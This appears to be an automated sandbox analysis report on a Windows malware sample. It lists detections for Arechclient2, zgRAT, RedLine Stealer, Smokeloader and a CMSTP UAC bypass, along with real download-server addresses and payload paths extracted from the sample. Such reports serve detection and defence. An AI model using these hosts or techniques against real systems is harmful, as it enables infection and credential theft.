Source: wxfSIz4PAi.exe, 00000000.00000003.1779436882.0000000005E12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1779911355.0000000005E0D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1773175262.0000000005E12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1778318773.0000000005E12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1776717405.0000000005E21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1779208680.0000000005E01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1778916335.0000000005E18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1777004508.0000000005E27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1767071882.0000000005E04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1774683419.0000000005DFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1779989651.0000000005E12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1767133423.0000000005E23000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1778539845.0000000005E18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1773287764.0000000005E17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1767166247.0000000005E27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1773145886.0000000005E01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1779536383.0000000005E17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000002.1987404213.0000000005E35000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs wxfSIz4PAi.exe
Source: wxfSIz4PAi.exe, 00000000.00000003.1773342257.0000000005E23000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe

Source: wxfSIz4PAi.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.2.run.exe.26ccd5b.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.run.exe.3e1e15b.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.cmd.exe.580fe64.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 21.2.cmd.exe.4b5c264.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.cmd.exe.62500c8.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 21.2.cmd.exe.51400c8.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 21.2.cmd.exe.51400c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 2.2.run.exe.26cc15b.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.cmd.exe.57cb976.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.run.exe.268886d.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.cmd.exe.62500c8.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272100c6ca8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 20.2.run.exe.3dda86d.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 4.2.cmd.exe.580f264.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 21.2.cmd.exe.4b5ce64.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.run.exe.3e1ed5b.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 21.2.cmd.exe.4b18976.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b94dad.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ed432f.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b847a3.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ead525.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ef8739.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b7537d.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000001.00000002.2160863373.00000000042D4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1985953400.00000000040F5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: C:\Users\user\AppData\Local\Temp\xtfky, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: C:\Users\user\AppData\Local\Temp\jwjqeqx, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT

Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2721bb00000.6.raw.unpack, WindowsIdentityProvider.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2721bb00000.6.raw.unpack, ApplicationFolderProvider.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2721bb00000.6.raw.unpack, ApplicationFolderProvider.cs	Security API names: System.IO.DirectoryInfo.GetAccessControl()
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2721bb00000.6.raw.unpack, ApplicationFolderProvider.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@27/63@5/8

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe

Code function: 1_2_6BBD7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

1_2_6BBD7030

Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe

Code function: 2_2_001AD660 GetDiskFreeSpaceExW,std::exception::exception,__CxxThrowException@8,

2_2_001AD660

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe

Code function: 0_2_040F5BD6 CreateToolhelp32Snapshot,Module32First,

0_2_040F5BD6

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe

Code function: 0_2_0042628B CoInitialize,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,

0_2_0042628B

Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe

Code function: 2_2_00188040 LoadResource,LockResource,SizeofResource,

2_2_00188040

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\e7cbbe5f9b9841e6afa735541f989b8a
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe	Mutant created: \Sessions\1\BaseNamedObjects\8dddf1vvvv
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Mutant created: \Sessions\1\BaseNamedObjects\Canon_UIW_Inst_v1
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3484
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7004

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe

File created: C:\Users\user\AppData\Local\Temp\u5ek.0.exe

Jump to behavior

Source: Yara match	File source: 6.0.u5ek.3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1819490382.00000000071F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1817573323.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe, type: DROPPED

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: two	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: two	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: two	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: Installed	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: Installed	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: .zip	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: .zip	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: \run.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: \run.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: @	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.90	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.90	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.90	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: Installed	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: Installed	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.228	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.228	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.228	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.59	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.59	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.203	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.203	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /syncUpd.exe	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /syncUpd.exe	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /timeSync.exe	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /timeSync.exe	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.203	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.59	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /timeSync.exe	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /syncUpd.exe	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: .exe	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: .exe	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /1/Package.zip	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /1/Package.zip	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /1/Package.zip	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: .zip	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: .zip	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: \run.exe	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: \run.exe	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.228	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.228	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /BroomSetup.exe	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /BroomSetup.exe	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: 185.172.128.228	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: /BroomSetup.exe	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: .exe	0_2_05B84C75
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Command line argument: .exe	0_2_05B84C75

Source: wxfSIz4PAi.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: u5ek.0.exe, 00000001.00000002.2206184854.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2206659257.000000006C98F000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: u5ek.0.exe, 00000001.00000002.2206184854.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2206659257.000000006C98F000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: u5ek.0.exe, 00000001.00000002.2206184854.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2206659257.000000006C98F000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: u5ek.0.exe, 00000001.00000002.2206184854.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2206659257.000000006C98F000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: u5ek.0.exe, u5ek.0.exe, 00000001.00000002.2206184854.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2206659257.000000006C98F000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: u5ek.0.exe, 00000001.00000002.2206184854.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: u5ek.0.exe, 00000001.00000002.2206184854.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2206659257.000000006C98F000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: u5ek.0.exe, 00000001.00000003.1759342949.00000000245B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
